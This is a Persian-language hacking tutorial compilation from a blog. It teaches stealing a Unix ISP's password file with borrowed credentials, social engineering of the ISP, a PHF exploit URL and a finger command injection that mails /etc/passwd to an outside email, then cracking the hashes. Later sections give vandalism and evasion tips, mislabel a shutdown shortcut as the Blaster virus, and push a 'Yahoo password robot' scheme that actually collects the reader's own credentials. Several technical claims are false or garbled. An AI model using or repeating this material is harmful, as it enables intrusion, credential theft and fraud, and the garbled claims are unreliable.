یکی از سرورهایی است که در جهان بسیار از آن استفاده می شود در ایران و دربیشتر شهر های بزرگ هم ISPهایی وجود دارند که سرور آن ها Unixباشند .بنابر این شما می توانید برای هک آن ها از این راه ها استفاده کنید شما در این راه احتمالا با مشکلات زیادی برخورد خواهید کرد .من راه کامل و بی عیبی را در اختیار شما نمی گذارم برای نفوذ گر شدن باید تلاش بسیاری کرد و این اشاره ای است که شما را به طرف راه درست هدایت می کند .برای هک یونیکس از این طریق عمل می کنند که با روش هایی که ذکر خواهد شد فایل حاوی Passwordها و IDها را که به نام Passwdمی باشد دریافت کنند .این فایل یک فایل متنی است که در آن اطلاعات بصورت رمز در آمده .وقتی شما یک فایل Passwdرا باز کنید چنین نوشته هایی را می بینید .که باید آن را از حالت رمز در آورد . root:2fkbNba29uWys:0:1:Operator:/:/bin/csh admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh Taha:3A62i9qr:1012:10:Mashhad در اینجا مثلا Tahaنام IDو 3a62...کلمه عبور اما به صورت رمز در آمده می باشد . شاید فایل به شکل زیر هم باشد .اما این فایل کار را غیرممکن می سازد.در صورتی که به شکل زیر باشد یعنی در آن علامت *به جای کلمه ی به رمز آمده به آن ها Shadowedگفته می شود . root:*:0:1:Operator:/:/bin/csh admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh Taha:*:1012:10:mashhad BFH:/home/user/Taha:/usr/local/bin/tcsh ما فعلا می خواهیم این فایل را دریافت کنیم .اولین قدم این است که آیدی در آن ISPبرای خود دست و پا کنیم .حالا این آیدی می تواند متعلق به دوستمان باشد و یا یک آشنای دور .پیدا کردن رمز دوست شما به سادگی میسر است که در حوصله این مقاله نمی گنجد .بعد از پیدا کردن رمز شما با آیدی دوستتان به شبکه Connectشوید .این اتصال می تواند یک اتصال به طریق Modem DialUp Connectionباشد .بعد از اتصال کامل وارد قسمت MS-DOS Promptشوید و فرمان زیر را وارد کنید FTP http://www.domain.com/ که Domainآدرس سرور ISPمی باشد سپس از شما خواسته می شود تا آیدی خود را وارد کنید کلمه ی Anonymousرا بزنید .سپس وقتی درخواست کلمه عبور شد کلید Enterرا بزنید .اگر وارد سیستم شدید موفق شده اید در غیر این صورت جمله ی login failedدریافت می شود .دوباره امتحان کنید و این بار در کادر Passwordآدرس Emailای را وارد کنید .اگر این بار هم جواب نداد به جای کلمه ی anonymousاز Userخود یعنی دوستتان استفاده کنید . احتمال دارد این بار هم موفق نشوید .این دفعه روش های فوق را برای دستور زیر امتحان کنید FTP ftp://ftp.domain.com/ اگر این بار هم جوابی نگرفتید با ISPتماس گرفته و سوال کنید که چگونه می توانم از سرور FTPخود شما استفاده کنم چون وارد سیتمتان نمی شود اگر پرسید برای چه می خواهید وارد شوید بگویید می خواهم از نرم افزار های آن استفاده کنم ولی مواظب باشید که نام خود را نگویید .خلاصه تمام تلاش خود را برای فهمیدن روش دستیابی به سیستم بکنید اگر توانستید وارد سیستم شوید به راحتی می توانید وارد شاخه ی مشخصی رفته و فایل Passwdها را بگیرید ولی احتمال دارد که آن شاخه برای شما قفل شده باشد .برای کار با FTPباید دستورات FTPرا یاد داشته باشید .برای لسیت دستورات می توانید ?را تایپ کنید .ابتدا به شاخه ی ETCبروید می توانید فایل passwdرا در آنجا پیدا کنید .این فایل را بگیرید .اگر در آنجا نبود شاخه های دیگر را امتحان کنید .ولی به احتمال زیاد همانجاست .حال اگر اصلا نتوانستید وارد FTPشوید می توانید این فایل را با استفاده از قایلبیت PHFبگیرید .به این صورت که در Internet Browserخود آدرس زیر را وارد کنید . http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd اگر به این صورت هم نتوانستید آن را بگیرید می توانید از طریق Fingerاین کار را انجام دهید .این روش به شرطی جواب می دهد که Serverمورد نظر قابلیت Fingerرا داشته باشد .به آدرس زیر مراجعه کنید . www.domain.com/cgi-bin/finger اگر این آدرس کار نکند دیگر هیچ امیدی نیست اما اگر کار کند کادری جلوی شما ظاهر می شود که می خواهد نام مورد نظر خود را بدهید .آدرس زیر را وارد کنید . ID@domain.com ; /bin/mail you@somewhere.com < etc/passwd که در این آدرس IDشناسه کاربری یک شخص است که مثلا می توانید از آیدی دوستتان استفاده کنید domain.comآدرس نام حوزه ی ISPاست و آدرس you@somewhere.comآدرس Emailشماست مثلا این یک نمونه است . bfh@internet.com ; /bin/mail amir6_6_6@yahoo.com < etc/passwd با وارد کردن این دستور فایل Passwdبرای من به آدرس 3dhack@yahoo.com پست می شود ! خوب حالا تا الان اگر توانسته اید فایل را گرفته باشید که بهتر در غیر اینصورت باید بی خیال این روش شوید . حالا اگر فایل shadowedگیر آوردید بقیه ی متن را نخوانید چون کمکی به شما نمی کند و باید از روش های دیگری استفاده کرد .اما اگر یک فایل مثل نمونه اولی که در بالا بود گیر آوردید می توانید کار خود را ادامه دهید حالا شما نیاز به یک برنامه ی Unix Password Crackerدارید معروف ترین این نوع برنامه ها John Ripperو Cracker Jackمی باشد .اما John Ripper سریعترین نوع این برنامه می باشد .این دو برنامه را می توانید از همان آدرس قبلی یعنی www.hackersclub.com/km/frontpageبه دست بیاورید اما نمونه ی دیگری از این نمونه برنامه ها به کتابخانه هک به نام jill_v20 ارسال شد .با استفاده از این برنامه ها می توانید به هدف خود برسید . به همین راحتی ..... و روش بعد : +در آینده ای نزدیک اگه پیشنهادها زیاد تر بشه و این بر و بچ پرشین بلاگ گیر ندن یه آموزش آماده کردم که با عکس توضیح دادم این روش 99 درصد عملی است و انجام می شه من که مشکلی نداشتم
با تشکر.مدیزیت سایت هکران نهاوند
با سلام این یه روش برای هک کردن سایت است که به مناسبت سال تحصیلی جدید برای شما می گذارم.امیدوارم استفاده کافی راببرید.یه نظر هم بذارین ما دلگرم شویم.البته این روش در بعضی سایتها قابل اجرا است.برای هک کردن یه سایت به ترتیب از راه داس به شرحه زیر است:
۱.بعد از انصال به شبکه٬میری تو داس و به شکل زیر عمل میکنی:
C:>telnet http://www.domail-name.com/ 79
بجای domain-name اسم سایتی که می خوای هکش کنی مینویسی.اگه پورت ۷۹ که در آخر آدرس مورد نظر نوشتی در سرور باز باشه شما وارد میشوید و گرنه نمیشه
۲.اگر پورت باز بود و شما وارد شدید مشغول خراب کاریتون بشین اونش دیگه به من ربطی نداره می خوای چه بلایی سر سایت بیاری.
نکته
1.اگر در هنگام خراب کاری متوجه شدین سرعت سیستمتون خیلی کم شد سری خارج شو.
2.اگه از ترس اینکه پیدات کنن٬بعد از خراب کاریت فورا ریست نکن.اول دیسکانکت بعد ریست.
3.همون طور که اول گفتم اگه چیزی از هک سایت و فرمانهای داس نمیدونی اصلا بهت توصیه نمیکنم این کارو بکنی.
4.اینکه من هیچ مسئولیتی ندارم.
با تشکر.مدیریت سایت هکران نهاوند
۲-فکر میکنم همه شما ویروس Blaster را بشناسید(ویروسی که باعث Shutdown شدن کامپیوتر در 60 ثانیه میشد...) و حتی عده کثیری از شما روش ساخت آن را بدانید ولی در پایان این سری مقالات و جهت تکمیل این سری از مقالات لازم میدانم نگاهی سریع به آن بیندازیم و سپس به نکات تکمیلی این سری مقالات میپردازیم.
این ویروس را به طرق مختلفی و با دستورات گوناگونی میتوان نوشت که در اینجا دو روش را مورد بررسی قرار میدهیم در ضمن لطفا اگر با...
این دستورات از قبل آشنایی ندارید حتما از Copy/Paste استفاده کنید .
با استفاده از Shortcut:در جایی از دسکتاپ خود Right Click کنید و در بخش New گزینه Shortcut را انتخاب کنید و در بخش ظاهر شده یکی از دستورات زیر را وارد کنید:
1)shutdown -s -t xx
2)%windir%system32shutdown.exe -s -t xx
توضیح: بعد از اینکه Paste کردید به جای xx در دستورات بالا مدت زمانی را بر حسب ثانیه قرار دهید تا کامپیوتر پس از آن زمان خاموش شود.
سپس Next را بزنید و برای فایل خود یک نام برگزینید و کار تمام است!!.
۳-این پیغام را واسه روبات یاهو بفرستید تا پسوردی رو که میخواهید واستون بفرسته
اول این مطالب را به ترتیب بنویسید و بعد واسه یاهو بفرستید تا پسورد را بهتون بعد از ۱ روز بدهد
خط اول (ایمیل خودتون*پسوردتون)به همین شکل داخل پرانتز بنوسید
خط دوم(ایمیل کسی که میخواهید هکش کنید)به همین شکل داخل پرانتز بنوسید
خط سوم این نوشته را همین جوری کپی میکنید
*****___Hotmailpswd_rtrvl_Xtra-----fast-----server(victimpswd)----Snd---bk---anypswd(crack---rtrvl%^&%^&%^&"£""!_______SND_____Free----4635---Yahoo--Aol---Hotmail____(robat_sender@yahoo.com)
Email----Cracker%^&&^&^*((
تمام همین حالا اینو واسه این ایمیل که ایمیل پسورد یاب یاهوست بفرستید این فرمان باعث میشه روبات هنگ کرده و هر چه را که شما میخواهید واستون بفرسته